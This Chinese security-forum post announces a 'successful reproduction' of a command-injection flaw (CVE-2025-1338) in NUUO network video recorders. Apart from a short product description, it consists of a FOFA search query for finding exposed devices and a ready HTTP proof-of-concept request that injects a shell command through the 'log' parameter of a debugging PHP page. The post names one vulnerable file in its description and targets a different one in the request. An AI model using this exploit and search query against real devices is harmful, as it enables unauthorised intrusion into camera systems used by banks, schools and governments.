【成功复现】NUUO Camera远程命令执行漏洞(CVE-2025-1338)-网络安全论坛-网络安全-阻击者联盟

【成功复现】NUUO Camera远程命令执行漏洞(CVE-2025-1338)

勾八徽章-人气大使-阻击者联盟等级-LV2-阻击者联盟昨天发布
620
NUUO摄像头‌是由中国台湾省NUUO公司生产的一款网络视频录像机(Network Video Recorder,简称NVR),广泛应用于零售、交通、教育、政府和银行等多个领域。

NUUO Camera 20250203及之前版本存在注入漏洞,该漏洞源于/handle_config.php的print_file函数中,参数log存在命令注入。

FOfa:

FOFA:title="Network Video Recorder Login "

 

POC:

GET /__debugging_center_utils___.php?log=;id HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

d2b5ca33bd20250418071941

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布文章发布帖子
扫码添加微信-阻击者联盟
在手机上浏览此页面